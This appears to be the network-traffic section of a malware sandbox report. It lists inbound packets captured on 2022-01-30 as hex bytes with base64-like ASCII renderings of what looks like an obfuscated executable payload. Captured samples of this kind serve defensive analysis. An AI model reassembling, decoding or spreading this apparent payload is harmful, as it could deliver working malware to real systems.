2022-01-30 12:43:18 UTC	232	IN	Data Raw: 36 5a 47 67 79 56 30 37 55 72 69 6a 48 52 65 41 41 41 41 6f 41 61 68 54 6e 33 52 45 44 62 64 75 33 52 65 46 33 75 34 6b 53 76 67 41 41 41 41 43 44 66 65 59 41 64 42 65 45 52 51 79 4a 0d 0a 4b 49 54 34 44 4c 52 6a 33 41 4f 37 71 6e 49 55 2f 2f 2b 4a 52 65 4c 72 42 38 64 4b 36 41 41 41 62 56 6a 34 46 49 43 37 41 70 61 51 42 2f 7a 2f 2f 2f 2f 2f 69 30 2f 59 69 55 58 72 78 30 58 4d 0d 0a 62 56 68 7a 51 61 39 33 68 30 35 58 51 67 43 4c 54 65 53 44 77 51 61 4a 54 64 53 45 56 64 53 4a 4f 4a 54 34 42 49 79 37 45 70 37 63 44 77 6a 48 41 51 41 41 41 41 71 4c 56 51 6a 49 51 67 51 41 0d 0a 62 56 68 7a 7a 43 33 2b 33 67 75 6e 79 55 30 49 69 31 58 77 69 77 69 4a 41 59 74 43 43 49 74 56 6e 64 4d 78 52 65 46 7a 55 38 55 61 73 73 63 42 41 41 41 41 41 49 46 56 38 4d 64 4e Data Ascii: 6ZGgyV07UrijHReAAAAoAahTn3REDbdu3ReF3u4kSvgAAAACDfeYAdBeERQyJKIT4DLRj3AO7qnIU//+JReLrB8dK6AAAbVj4FIC7ApaQB/z/////i0/YiUXrx0XMbVhzQa93h05XQgCLTeSDwQaJTdSEVdSJOJT4BIy7Ep7cDwjHAQAAAAqLVQjIQgQAbVhzzC3+3gunyU0Ii1XwiwiJAYtCCItVndMxReFzU8UasscBAAAAAIFV8MdN
2022-01-30 12:43:18 UTC	248	IN	Data Raw: 46 39 41 6f 41 41 41 41 41 74 6b 58 30 36 4a 67 48 59 5a 6f 39 52 77 74 48 54 56 63 46 6f 49 49 47 45 50 67 50 45 55 55 66 69 30 30 49 0d 0a 71 31 6c 65 79 6a 30 36 31 49 78 57 79 31 55 49 38 67 38 51 52 52 70 6d 44 79 34 4b 65 49 49 47 66 63 65 46 68 53 78 49 59 73 55 53 53 73 59 41 4d 49 74 4e 43 49 6e 42 41 59 6c 43 43 49 74 56 0d 0a 5a 5a 35 78 62 2b 4e 33 58 38 32 58 51 34 6c 46 43 49 74 4e 43 4d 77 42 4d 49 74 61 43 49 50 43 62 4e 45 6d 53 65 4e 33 58 36 65 6a 51 67 41 41 69 30 55 4d 4b 30 38 49 67 2f 67 65 66 52 64 6f 0d 0a 7a 32 31 7a 51 51 43 61 4d 6b 68 48 4b 74 42 39 42 68 44 6f 46 36 67 44 41 49 50 4c 44 4d 64 46 6b 56 68 7a 51 57 6a 31 45 72 35 58 51 67 41 41 67 2b 77 49 38 67 55 51 52 52 44 39 44 78 45 45 0d 0a 53 64 55 6d 73 54 71 2f 45 72 Data Ascii: F9AoAAAAAtkX06JgHYZo9RwtHTVcFoIIGEPgPEUUfi00Iq1leyj061IxWy1UI8g8QRRpmDy4KeIIGfceFhSxIYsUSSsYAMItNCInBAYlCCItVZZ5xb+N3X82XQ4lFCItNCMwBMItaCIPCbNEmSeN3X6ejQgAAi0UMK08Ig/gefRdoz21zQQCaMkhHKtB9BhDoF6gDAIPLDMdFkVhzQWj1Er5XQgAAg+wI8gUQRRD9DxEESdUmsTq/Er
2022-01-30 12:43:18 UTC	264	IN	Data Raw: 32 76 61 38 79 34 38 78 52 55 6a 50 4a 69 31 58 38 67 38 67 45 69 51 71 47 53 67 53 4c 0d 0a 4b 4b 54 77 67 57 78 69 33 41 4e 66 77 63 45 45 55 65 68 74 78 77 67 41 67 38 51 48 69 31 58 38 71 6c 71 6e 4a 57 34 69 33 41 75 72 79 55 30 49 69 31 45 4d 69 56 6f 4d 69 30 58 7a 67 38 41 51 0d 0a 35 42 32 4c 79 69 58 4b 6b 45 2f 6a 77 41 59 51 4d 39 4b 4c 52 66 4b 44 77 41 53 47 45 49 6c 51 61 64 4d 2b 75 65 76 7a 55 78 2f 63 46 77 69 44 77 68 52 53 36 43 6e 48 41 67 43 4d 78 41 69 4c 0d 0a 4b 4b 43 30 51 55 53 78 55 56 37 63 42 2f 79 4c 35 56 33 43 42 41 72 4d 7a 4d 7a 44 7a 4d 7a 4d 6f 5a 53 2f 6a 61 54 2b 6d 34 49 43 79 65 78 52 69 55 33 38 69 30 2f 38 78 77 43 37 67 67 59 51 0d 0a 58 70 48 34 46 4a 53 78 6c 55 72 65 53 49 6c 4b 42 49 74 46 2f 49 6e 41 42 46 Data Ascii: 2va8y48xRUjPJi1X8g8gEiQqGSgSLKKTwgWxi3ANfwcEEUehtxwgAg8QHi1X8qlqnJW4i3AuryU0Ii1EMiVoMi0Xzg8AQ5B2LyiXKkE/jwAYQM9KLRfKDwASGEIlQadM+uevzUx/cFwiDwhRS6CnHAgCMxAiLKKC0QUSxUV7cB/yL5V3CBArMzMzDzMzMoZS/jaT+m4ICyexRiU38i0/8xwC7ggYQXpH4FJSxlUreSIlKBItF/InABF
2022-01-30 12:43:18 UTC	280	IN	Data Raw: 47 52 65 2b 39 78 6b 58 70 43 73 5a 46 0d 0a 69 70 61 31 42 49 41 35 6b 51 75 2b 4e 73 5a 46 36 74 2f 47 52 65 47 75 78 6b 58 6a 4e 4d 5a 46 67 4d 75 31 42 49 5a 5a 39 75 72 2f 52 52 43 44 34 41 45 50 68 59 49 41 41 41 43 45 44 61 53 6f 0d 0a 61 6b 6a 77 69 47 6d 37 57 75 72 2f 52 52 44 47 42 61 4f 6f 42 78 6f 42 44 31 66 50 5a 67 38 54 4b 4b 69 59 55 2b 4e 6e 70 38 32 56 51 34 74 46 39 49 50 51 41 49 4e 56 38 49 6c 4b 39 49 4e 39 0d 0a 6d 56 67 45 41 68 6f 30 31 44 4f 6e 54 58 4d 37 61 67 42 71 41 59 46 4e 39 46 47 45 56 66 42 53 68 57 76 36 51 32 69 35 70 2f 5a 57 51 67 41 41 61 38 67 41 6a 58 59 4e 34 47 6f 50 61 67 47 4c 0d 0a 4f 4b 77 68 79 69 33 43 42 36 5a 44 79 77 49 41 69 67 77 33 69 49 4b 55 71 41 63 66 36 36 56 6f 48 58 5a 31 55 59 44 55 33 30 Data Ascii: GRe+9xkXpCsZFipa1BIA5kQu+NsZF6t/GReGuxkXjNMZFgMu1BIZZ9ur/RRCD4AEPhYIAAACEDaSoakjwiGm7Wur/RRDGBaOoBxoBD1fPZg8TKKiYU+Nnp82VQ4tF9IPQAINV8IlK9IN9mVgEAho01DOnTXM7agBqAYFN9FGEVfBShWv6Q2i5p/ZWQgAAa8gAjXYN4GoPagGLOKwhyi3CB6ZDywIAigw3iIKUqAcf66VoHXZ1UYDU30
2022-01-30 12:43:18 UTC	296	IN	Data Raw: 4c 51 6a 71 55 42 70 56 55 37 64 54 6a 65 49 69 4a 43 6d 42 78 72 72 70 57 6a 50 50 51 59 51 68 61 49 70 51 32 69 78 6b 30 72 76 30 71 59 48 45 46 39 65 69 2b 39 64 77 38 7a 44 7a 4d 7a 4d 0d 0a 4f 4e 4f 66 77 6f 52 79 41 52 6e 65 44 2f 7a 48 52 66 67 76 41 41 6f 41 78 6b 58 50 43 63 5a 46 72 42 69 31 42 4b 6f 44 6b 51 75 55 50 63 5a 46 78 4c 4c 47 52 63 38 5a 78 6b 58 4a 45 73 5a 46 0d 0a 71 6b 4f 31 42 4b 41 4e 6b 51 75 65 47 38 5a 46 79 6a 50 47 52 63 45 78 78 6b 58 44 73 73 5a 46 6f 45 47 31 42 4b 5a 6e 6b 51 75 59 46 4d 5a 46 30 44 37 47 52 64 74 59 78 6b 58 64 4d 4d 5a 46 0d 0a 76 6a 75 31 42 4c 79 51 6b 51 75 43 46 63 5a 46 31 6c 62 47 52 64 30 49 78 6b 58 58 65 38 5a 46 74 45 57 31 42 4c 49 70 6b 51 75 4d 50 38 5a 46 33 4c 66 47 52 64 63 2b 78 6b Data Ascii: LQjqUBpVU7dTjeIiJCmBxrrpWjPPQYQhaIpQ2ixk0rv0qYHEF9ei+9dw8zDzMzMONOfwoRyARneD/zHRfgvAAoAxkXPCcZFrBi1BKoDkQuUPcZFxLLGRc8ZxkXJEsZFqkO1BKANkQueG8ZFyjPGRcExxkXDssZFoEG1BKZnkQuYFMZF0D7GRdtYxkXdMMZFvju1BLyQkQuCFcZF1lbGRd0IxkXXe8ZFtEW1BLIpkQuMP8ZF3LfGRdc+xk
2022-01-30 12:43:18 UTC	312	IN	Data Raw: 6e 50 47 52 65 6e 6b 78 6b 58 72 79 4d 5a 46 69 4b 69 31 42 49 36 4f 6b 51 75 77 74 38 5a 46 36 4a 50 47 52 65 50 75 78 6b 58 6c 63 63 5a 46 0d 0a 68 76 4f 31 42 49 54 2b 6b 51 75 36 75 4d 5a 46 37 72 6a 47 52 65 57 62 6f 65 69 51 42 78 43 44 6a 56 6c 38 78 4f 41 79 56 30 37 63 54 2b 69 66 42 78 43 44 79 51 75 4a 44 65 69 51 42 78 44 47 0d 0a 61 4c 7a 73 52 6e 67 7a 57 42 6d 58 4a 41 38 54 52 66 44 72 45 6f 46 56 38 49 50 4e 41 59 74 46 6d 64 75 6a 51 65 46 6e 70 38 63 53 74 6f 4e 39 39 41 42 33 51 33 67 47 67 33 33 2f 45 48 4d 37 0d 0a 42 31 67 5a 51 4f 4e 2f 6f 78 2f 63 46 2f 42 53 36 41 38 73 41 67 71 4c 38 4c 67 4f 41 41 41 41 42 70 42 7a 7a 42 51 2f 74 79 52 58 4b 41 47 4c 56 66 52 53 69 30 2f 77 55 4f 6a 2f 4b 77 49 41 0d 0a 35 31 52 45 79 65 44 6d Data Ascii: nPGRenkxkXryMZFiKi1BI6OkQuwt8ZF6JPGRePuxkXlccZFhvO1BIT+kQu6uMZF7rjGReWboeiQBxCDjVl8xOAyV07cT+ifBxCDyQuJDeiQBxDGaLzsRngzWBmXJA8TRfDrEoFV8IPNAYtFmdujQeFnp8cStoN99AB3Q3gGg33/EHM7B1gZQON/ox/cF/BS6A8sAgqL8LgOAAAABpBzzBQ/tyRXKAGLVfRSi0/wUOj/KwIA51REyeDm
2022-01-30 12:43:18 UTC	328	IN	Data Raw: 78 7a 34 46 4a 52 67 76 35 32 74 51 77 43 44 78 41 69 4c 52 66 61 4c 35 56 33 4e 42 41 44 4d 0d 0a 4f 4e 4f 66 4b 35 64 61 39 30 6c 52 55 6d 53 68 41 41 41 41 41 46 70 6b 69 53 55 50 41 41 41 41 37 72 52 2f 79 43 58 65 33 41 75 37 77 65 68 6f 69 55 58 6f 69 30 66 6f 67 38 46 6e 36 4b 35 55 0d 0a 6b 71 66 34 44 49 43 78 6c 69 62 65 44 2f 43 4c 56 66 44 48 41 6c 70 6c 42 68 44 49 52 66 77 41 62 56 68 7a 79 69 33 43 6b 45 34 58 4a 67 59 51 69 30 33 77 55 65 4b 51 39 51 45 50 67 38 51 45 0d 0a 71 68 32 50 76 70 66 4e 71 4d 55 43 53 6f 50 69 41 58 51 55 61 4c 6f 41 41 41 43 45 52 65 79 44 68 54 41 6a 71 53 37 49 56 6b 37 55 68 67 69 4c 52 65 79 44 36 47 4b 4c 54 66 52 72 69 51 30 41 0d 0a 62 56 68 7a 79 6f 31 76 6c 55 70 58 6a 73 7a 4d 7a 4d 7a 4d 7a 46 2b 4c Data Ascii: xz4FJRgv52tQwCDxAiLRfaL5V3NBADMONOfK5da90lRUmShAAAAAFpkiSUPAAAA7rR/yCXe3Au7wehoiUXoi0fog8Fn6K5Ukqf4DICxlibeD/CLVfDHAlplBhDIRfwAbVhzyi3CkE4XJgYQi03wUeKQ9QEPg8QEqh2PvpfNqMUCSoPiAXQUaLoAAACEReyDhTAjqS7IVk7UhgiLReyD6GKLTfRriQ0AbVhzyo1vlUpXjszMzMzMzF+L
2022-01-30 12:43:18 UTC	344	IN	Data Raw: 51 45 41 69 59 2f 30 2b 66 2f 77 6a 59 31 49 0d 0a 6d 4b 65 4d 71 63 41 58 71 4c 48 63 56 79 43 66 42 78 42 53 6f 54 61 66 42 78 42 66 6a 55 33 6b 68 56 75 51 76 4a 64 69 76 35 4f 49 76 2f 38 50 74 73 69 46 79 51 57 45 6c 77 49 50 41 49 50 73 0d 0a 64 64 4f 6e 79 4d 33 43 72 72 47 6f 45 4b 48 4d 6e 67 63 51 55 49 64 4e 35 4f 6a 58 34 76 33 2f 35 70 43 62 45 49 7a 50 71 4b 5a 62 55 67 41 41 69 45 58 4e 69 6b 66 4e 69 45 33 44 44 37 5a 56 0d 0a 6f 64 32 68 54 75 77 44 56 6b 35 58 4b 41 43 44 37 42 69 4c 78 49 4f 6c 37 50 6e 77 2f 31 43 4c 59 44 7a 73 52 6e 68 6a 32 67 4f 7a 71 70 72 69 2f 66 2b 4c 79 4f 49 54 35 50 33 77 69 59 58 6f 0d 0a 6c 4b 65 4d 68 79 33 4f 49 38 32 37 57 6f 76 4d 69 61 58 6b 2b 66 58 2f 6a 56 57 72 55 75 69 31 6d 71 61 4d 79 4f 33 53 Data Ascii: QEAiY/0+f/wjY1ImKeMqcAXqLHcVyCfBxBSoTafBxBfjU3khVuQvJdiv5OIv/8PtsiFyQWElwIPAIPsddOnyM3CrrGoEKHMngcQUIdN5OjX4v3/5pCbEIzPqKZbUgAAiEXNikfNiE3DD7ZVod2hTuwDVk5XKACD7BiLxIOl7Pnw/1CLYDzsRnhj2gOzqpri/f+LyOIT5P3wiYXolKeMhy3OI827WovMiaXk+fX/jVWrUui1mqaMyO3S
2022-01-30 12:43:18 UTC	360	IN	Data Raw: 0a 71 56 7a 36 42 4c 44 30 45 72 4a 56 7a 34 30 59 2f 76 2f 2f 36 47 59 41 2f 2f 2b 43 68 65 54 39 6b 71 63 6a 79 69 58 71 33 46 2f 63 44 39 69 4c 51 68 54 2f 30 49 46 4e 33 49 50 47 42 49 6c 4e 0d 0a 73 5a 34 32 76 57 79 35 41 70 62 63 51 49 74 4e 32 49 74 51 45 50 58 53 69 45 58 6b 69 30 58 49 56 68 31 58 54 75 79 39 56 30 35 58 79 55 33 59 69 78 47 4c 54 64 4b 4c 51 67 7a 77 30 49 68 46 0d 0a 67 4e 58 2b 61 5a 62 4e 71 4d 63 61 2f 6f 74 56 76 49 6d 56 58 50 58 2f 2f 34 74 4b 76 49 4e 34 65 55 67 42 54 61 2b 33 4e 37 47 6f 76 51 45 41 41 41 44 72 43 73 32 46 59 50 2f 77 2f 77 41 41 0d 0a 62 56 6a 35 7a 41 6a 4e 71 4c 48 66 44 2b 34 50 74 6c 58 75 68 64 68 30 46 34 74 4b 76 49 73 49 35 4e 57 48 76 35 66 4e 33 4e 75 6a 76 50 2f 2f 69 5a 56 63 2f 2f 58 2f Data Ascii: qVz6BLD0ErJVz40Y/v//6GYA//+CheT9kqcjyiXq3F/cD9iLQhT/0IFN3IPGBIlNsZ42vWy5ApbcQItN2ItQEPXSiEXki0XIVh1XTuy9V05XyU3YixGLTdKLQgzw0IhFgNX+aZbNqMca/otVvImVXPX//4tKvIN4eUgBTa+3N7GovQEAAADrCs2FYP/w/wAAbVj5zAjNqLHfD+4PtlXuhdh0F4tKvIsI5NWHv5fN3NujvP//iZVc//X/
2022-01-30 12:43:18 UTC	376	IN	Data Raw: 68 41 41 41 41 41 46 70 6b 69 53 55 50 41 41 41 41 37 72 52 50 79 43 58 61 33 41 75 2f 79 30 58 73 69 30 33 73 69 55 66 77 69 31 58 6a 67 38 49 45 0d 0a 35 41 32 76 79 69 33 65 31 49 35 66 79 30 58 59 69 30 33 77 67 7a 4d 41 44 34 53 52 41 41 41 41 35 67 32 76 79 6d 71 37 45 6f 72 63 44 2f 43 4c 45 59 6c 56 77 49 46 46 36 49 6c 4b 31 49 74 4e 0d 0a 75 64 45 2b 2f 65 4e 6e 76 38 63 43 6b 6f 74 46 30 49 6c 46 75 49 46 4e 32 49 74 61 38 49 73 42 52 6c 71 79 75 57 71 37 45 6f 4c 63 44 2f 43 4c 45 59 6c 56 79 49 46 46 7a 4d 48 76 41 6f 6c 46 0d 0a 69 64 4d 2b 69 65 46 2f 74 34 6b 53 76 67 41 41 41 41 43 42 66 65 34 41 45 41 41 50 63 67 32 4e 4f 4c 77 68 7a 43 33 53 42 36 59 62 2b 50 2f 2f 69 30 33 6b 55 59 46 56 34 46 4c 6e 68 57 34 42 0d 0a 62 64 75 33 53 61 Data Ascii: hAAAAAFpkiSUPAAAA7rRPyCXa3Au/y0Xsi03siUfwi1Xjg8IE5A2vyi3e1I5fy0XYi03wgzMAD4SRAAAA5g2vymq7EorcD/CLEYlVwIFF6IlK1ItNudE+/eNnv8cCkotF0IlFuIFN2Ita8IsBRlqyuWq7EoLcD/CLEYlVyIFFzMHvAolFidM+ieF/t4kSvgAAAACBfe4AEAAPcg2NOLwhzC3SB6Yb+P//i03kUYFV4FLnhW4Bbdu3Sa
2022-01-30 12:43:18 UTC	392	IN	Data Raw: 6f 6a 67 75 30 45 41 49 79 50 55 54 63 46 2f 78 53 36 41 66 6e 2f 2f 57 4c 52 66 7a 4a 51 41 6f 41 0d 0a 35 72 30 75 67 71 54 2b 6d 34 4b 62 6a 73 7a 4d 7a 4d 7a 4d 7a 46 2b 4c 37 46 47 47 54 66 79 4c 4b 4b 52 38 39 79 41 6a 30 6f 63 6a 58 47 69 56 79 7a 63 68 61 4a 39 44 59 2f 39 6c 41 47 6f 52 0d 0a 35 67 32 50 45 34 44 31 73 62 47 6f 79 55 58 38 78 6b 41 52 41 49 48 6c 58 63 50 44 7a 4d 7a 4d 6f 5a 53 2f 6a 61 54 2b 6d 34 49 43 79 65 78 52 69 55 33 38 69 30 2f 38 44 37 5a 48 45 59 58 4a 0d 0a 47 55 59 62 68 4d 30 4e 64 69 5a 43 6c 5a 73 46 61 67 42 71 45 59 46 56 2f 46 4c 6e 68 2b 62 2f 6b 74 4d 32 76 61 35 79 52 6b 37 63 70 31 33 44 7a 4d 7a 4d 7a 4d 62 4d 7a 4d 7a 44 7a 4d 7a 4d 0d 0a 4f 4e 4f 66 45 4f 46 2f 71 38 55 53 76 67 2b 32 53 42 4b 46 79 58 Data Ascii: ojgu0EAIyPUTcF/xS6Afn//WLRfzJQAoA5r0ugqT+m4KbjszMzMzMzF+L7FGGTfyLKKR89yAj0ocjXGiVyzchaJ9DY/9lAGoR5g2PE4D1sbGoyUX8xkARAIHlXcPDzMzMoZS/jaT+m4ICyexRiU38i0/8D7ZHEYXJGUYbhM0NdiZClZsFagBqEYFV/FLnh+b/ktM2va5yRk7cp13DzMzMzMbMzMzDzMzMONOfEOF/q8USvg+2SBKFyX
2022-01-30 12:43:18 UTC	408	IN	Data Raw: 6c 41 41 41 41 41 4c 4b 34 4a 41 41 50 36 4c 34 57 0d 0a 62 46 69 30 42 4a 51 79 56 30 35 58 7a 30 55 49 69 55 58 67 69 30 66 67 69 55 33 58 69 31 58 67 37 69 4a 6e 55 52 6f 37 6b 41 75 4c 51 77 41 41 41 4f 73 48 78 30 2f 63 41 41 41 50 41 49 70 46 0d 0a 73 64 41 32 73 6d 65 45 47 72 33 53 69 33 51 4f 69 31 58 67 69 77 69 4a 52 62 69 45 54 62 69 4a 49 49 44 34 46 4c 43 37 41 76 72 63 42 37 53 4a 52 62 42 71 52 47 41 41 6a 59 31 44 2f 2f 2f 2f 0d 0a 50 4c 43 5a 35 70 66 4e 50 56 34 39 51 6f 31 56 6b 46 4c 6f 33 61 33 2f 2f 7a 50 50 69 45 58 79 34 42 57 42 71 53 69 58 71 62 48 65 42 39 53 4c 54 64 54 6f 78 64 4c 2f 2f 32 67 50 49 41 41 41 0d 0a 34 4e 56 50 6d 70 66 4e 42 73 55 43 6c 6c 4a 71 41 47 67 6f 63 41 77 51 36 48 6e 78 2f 66 2f 2f 76 57 75 7a 79 53 Data Ascii: lAAAAALK4JAAP6L4WbFi0BJQyV05Xz0UIiUXgi0fgiU3Xi1Xg7iJnURo7kAuLQwAAAOsHx0/cAAAPAIpFsdA2smeEGr3Si3QOi1XgiwiJRbiETbiJIID4FLC7AvrcB7SJRbBqRGAAjY1D////PLCZ5pfNPV49Qo1VkFLo3a3//zPPiEXy4BWBqSiXqbHeB9SLTdToxdL//2gPIAAA4NVPmpfNBsUCllJqAGgocAwQ6Hnx/f//vWuzyS
2022-01-30 12:43:18 UTC	424	IN	Data Raw: 4e 0d 0a 6d 54 7a 36 54 47 67 79 56 30 37 63 70 31 33 43 43 41 42 6d 6b 46 45 75 41 78 43 35 4c 67 4d 51 65 6e 64 77 55 52 41 64 56 46 36 4f 62 51 4d 51 4f 6a 41 44 45 4a 45 77 41 78 44 7a 4d 41 4d 51 0d 0a 62 56 6c 78 52 6d 73 32 55 45 6c 51 52 51 63 48 42 77 63 48 42 77 30 48 42 77 63 49 42 77 63 48 61 6c 39 32 52 6d 38 31 55 45 6c 51 52 51 63 48 42 77 63 48 42 77 30 48 42 77 63 49 42 77 63 48 0d 0a 61 6c 39 30 52 6d 38 31 55 45 6c 51 52 51 63 48 42 77 63 48 42 77 30 48 42 77 63 49 42 77 63 48 61 6c 39 30 52 6d 38 31 55 45 6c 51 52 51 63 48 42 73 7a 4d 7a 4d 62 4d 7a 4d 7a 44 7a 4d 7a 4d 0d 0a 4f 4e 4f 66 77 6f 51 71 33 67 4f 6e 77 65 77 49 33 55 55 49 33 52 59 6b 36 4e 6b 6e 41 51 43 44 71 56 44 72 78 4b 68 4e 58 6f 6b 53 74 67 45 41 41 41 44 72 42 38 Data Ascii: NmTz6TGgyV07cp13CCABmkFEuAxC5LgMQendwURAdVF6ObQMQOjADEJEwAxDzMAMQbVlxRms2UElQRQcHBwcHBw0HBwcIBwcHal92Rm81UElQRQcHBwcHBw0HBwcIBwcHal90Rm81UElQRQcHBwcHBw0HBwcIBwcHal90Rm81UElQRQcHBszMzMbMzMzDzMzMONOfwoQq3gOnwewI3UUI3RYk6NknAQCDqVDrxKhNXokStgEAAADrB8
2022-01-30 12:43:18 UTC	440	IN	Data Raw: 6f 6c 4e 31 49 74 56 31 46 69 4e 6a 59 54 30 2f 2f 2f 6f 61 65 43 50 76 75 57 33 30 37 57 6f 76 59 6d 46 6c 50 76 2f 2f 38 79 46 6d 50 76 77 2f 77 48 47 0d 0a 4b 4b 52 35 7a 4f 56 65 72 4c 47 6f 79 34 30 30 2f 2f 2f 2f 6a 5a 2b 63 2b 2f 2f 77 69 5a 55 34 6b 71 65 4d 79 75 30 47 71 4c 47 6f 79 59 30 34 2f 2f 2f 2f 69 59 38 73 2f 2f 2f 77 69 59 30 77 0d 0a 6b 71 65 4d 4b 32 70 59 56 73 58 43 63 76 2f 2f 2f 31 4b 4c 68 53 62 2f 2f 2f 39 66 6a 59 32 77 6c 4b 65 4d 71 59 6a 75 71 72 48 61 7a 37 44 35 2f 2f 2b 4a 6a 63 72 35 2f 2f 2f 4a 68 63 54 35 0d 0a 6b 71 64 79 68 79 33 4f 58 49 6b 53 6b 74 69 65 42 78 43 4c 56 64 70 53 6a 59 32 76 2b 2f 2f 2f 68 63 76 46 76 5a 65 2f 30 75 36 73 76 66 2b 4a 68 62 44 37 2f 2f 58 47 68 62 54 30 2f 2f 38 42 0d 0a 71 78 32 50 Data Ascii: olN1ItV1FiNjYT0///oaeCPvuW307WovYmFlPv//8yFmPvw/wHGKKR5zOVerLGoy400////jZ+c+//wiZU4kqeMyu0GqLGoyY04////iY8s///wiY0wkqeMK2pYVsXCcv///1KLhSb///9fjY2wlKeMqYjuqrHaz7D5//+Jjcr5///JhcT5kqdyhy3OXIkSktieBxCLVdpSjY2v+///hcvFvZe/0u6svf+JhbD7//XGhbT0//8Bqx2P
2022-01-30 12:43:18 UTC	456	IN	Data Raw: 76 2f 2f 35 74 31 6e 76 35 66 4e 33 4d 4e 50 76 50 2f 2f 69 59 55 4d 2f 76 58 2f 69 59 30 66 2f 76 2f 2f 0d 0a 42 31 6f 5a 51 4f 4f 6e 52 37 43 6f 76 56 4b 4c 68 51 7a 2b 2f 2f 56 51 6a 59 30 62 2b 76 2f 2f 68 63 76 64 76 4a 65 2f 32 6c 71 74 76 66 2b 4a 6a 53 54 36 2f 2f 58 47 68 53 6a 31 2f 2f 38 42 0d 0a 71 78 32 50 55 71 2b 33 57 37 47 6f 76 64 69 65 42 78 43 4c 6c 51 62 2f 2f 2f 39 64 6a 59 30 6f 6c 71 65 4d 71 53 69 36 71 37 48 61 78 79 6a 37 2f 2f 2b 4a 68 54 4c 37 2f 2f 2f 4a 68 54 7a 37 0d 0a 6b 71 64 79 68 79 33 4f 51 38 32 37 57 6f 76 4d 69 61 56 77 2f 50 58 2f 69 55 32 58 6a 56 56 4d 35 4d 31 37 76 70 66 4e 33 4d 74 66 76 66 2f 2f 69 59 56 73 2f 50 58 2f 6a 55 33 54 55 51 2b 32 0d 0a 4f 49 4d 68 79 69 57 71 76 78 76 47 76 76 2f 47 52 66 77 56 Data Ascii: v//5t1nv5fN3MNPvP//iYUM/vX/iY0f/v//B1oZQOOnR7CovVKLhQz+//VQjY0b+v//hcvdvJe/2lqtvf+JjST6//XGhSj1//8Bqx2PUq+3W7GovdieBxCLlQb///9djY0olqeMqSi6q7Haxyj7//+JhTL7///JhTz7kqdyhy3OQ827WovMiaVw/PX/iU2XjVVM5M17vpfN3Mtfvf//iYVs/PX/jU3TUQ+2OIMhyiWqvxvGvv/GRfwV
2022-01-30 12:43:18 UTC	472	IN	Data Raw: 55 32 38 55 59 32 56 56 50 62 2f 2f 31 4a 6c 41 47 67 4d 0d 0a 48 56 35 6a 71 53 41 4f 71 72 47 6f 6b 6d 6f 42 6a 59 30 34 2f 76 58 2f 36 4a 6d 66 2f 66 2f 47 4b 4b 52 33 63 71 69 36 45 71 54 61 44 2b 72 6f 32 44 4c 2b 2f 34 4e 46 75 49 74 43 75 4f 68 74 0d 0a 66 61 65 4d 79 69 57 4b 42 73 58 43 4f 76 2f 2f 2f 31 4b 4e 52 53 35 51 69 34 31 37 2f 2f 2f 2f 50 4e 58 6d 43 5a 62 4e 71 42 79 2f 69 57 62 38 2f 31 44 6f 52 57 7a 38 2f 31 44 6e 76 32 62 38 0d 0a 6b 67 69 62 2b 41 37 4f 71 48 32 58 79 6b 58 70 6a 55 33 70 36 42 59 6c 2f 76 2b 47 52 62 53 4c 49 4f 79 62 59 47 66 4e 71 4d 55 61 39 6c 47 4e 6c 56 54 38 2f 2f 56 53 6a 59 56 48 2f 76 2f 2f 0d 0a 50 62 44 35 4a 35 54 4e 42 36 62 54 4a 50 7a 2f 4d 38 6d 49 54 65 4b 4e 54 65 6a 6e 6c 2f 44 39 6b 74 45 32 Data Ascii: U28UY2VVPb//1JlAGgMHV5jqSAOqrGokmoBjY04/vX/6Jmf/f/GKKR3cqi6EqTaD+ro2DL+/4NFuItCuOhtfaeMyiWKBsXCOv///1KNRS5Qi417////PNXmCZbNqBy/iWb8/1DoRWz8/1Dnv2b8kgib+A7OqH2XykXpjU3p6BYl/v+GRbSLIOybYGfNqMUa9lGNlVT8//VSjYVH/v//PbD5J5TNB6bTJPz/M8mITeKNTejnl/D9ktE2
2022-01-30 12:43:18 UTC	488	IN	Data Raw: 67 59 51 0d 0a 68 53 32 62 51 57 69 78 6b 30 4c 63 46 2f 79 4c 41 6f 6f 49 69 45 66 34 67 48 33 33 41 41 2b 45 37 56 68 7a 51 65 68 50 72 30 38 6a 53 6f 42 39 2b 41 4a 30 50 4f 46 2b 69 31 58 7a 69 77 4b 4c 0d 0a 4a 56 44 36 44 4a 69 35 41 72 37 65 46 2b 79 4c 52 65 79 4a 52 65 4b 4c 54 65 69 45 45 59 73 43 35 42 32 58 79 69 58 57 33 67 4f 33 7a 31 58 67 69 56 58 63 69 30 2f 63 69 77 69 45 56 66 79 4a 0d 0a 4a 31 79 59 44 2b 4e 33 71 38 56 66 79 56 45 49 69 56 58 59 69 30 2f 59 69 55 58 37 69 30 33 30 35 42 57 37 79 6a 33 47 33 45 7a 65 42 39 53 4c 54 64 53 4a 54 64 71 4e 56 64 43 47 56 63 79 4c 0d 0a 4b 4a 54 34 53 65 4e 6e 71 38 63 64 53 75 73 57 69 30 58 38 78 30 6f 4d 41 51 41 50 41 4f 73 4b 35 68 57 50 68 69 6b 2b 56 30 35 58 51 6f 76 6c 58 63 50 4d Data Ascii: gYQhS2bQWixk0LcF/yLAooIiEf4gH33AA+E7VhzQehPr08jSoB9+AJ0POF+i1XziwKLJVD6DJi5Ar7eF+yLReyJReKLTeiEEYsC5B2XyiXW3gO3z1XgiVXci0/ciwiEVfyJJ1yYD+N3q8VfyVEIiVXYi0/YiUX7i0305BW7yj3G3EzeB9SLTdSJTdqNVdCGVcyLKJT4SeNnq8cdSusWi0X8x0oMAQAPAOsK5hWPhik+V05XQovlXcPM
2022-01-30 12:43:18 UTC	504	IN	Data Raw: 58 30 77 59 51 38 67 39 59 77 63 6e 4d 7a 4d 7a 44 7a 4d 7a 4d 6f 5a 53 2f 6a 61 54 2b 6d 34 4c 55 66 35 79 74 42 78 41 47 66 42 76 46 2b 57 37 4f 78 4f 4e 35 0d 0a 54 35 70 79 49 35 6e 4d 58 36 69 58 67 51 39 58 79 66 49 50 4b 73 41 50 56 38 44 39 44 79 72 42 72 4c 46 73 73 32 64 72 57 6b 37 47 52 42 44 79 44 31 67 45 7a 66 4b 51 42 68 44 39 44 31 6a 42 0d 0a 72 67 33 34 72 5a 35 33 58 30 38 42 79 66 48 48 42 67 79 52 42 68 70 30 43 6d 6f 44 56 75 68 72 6c 36 65 4d 47 44 47 35 6b 52 41 4b 67 41 51 41 56 59 76 73 69 30 38 4d 67 2b 67 50 64 44 4f 44 0d 0a 68 56 6b 48 59 65 76 61 56 6a 70 47 77 65 67 42 64 41 55 7a 77 45 72 72 4d 4f 67 6e 2b 2f 2f 2f 68 6c 32 62 51 35 50 4e 71 45 48 68 67 75 73 66 2f 33 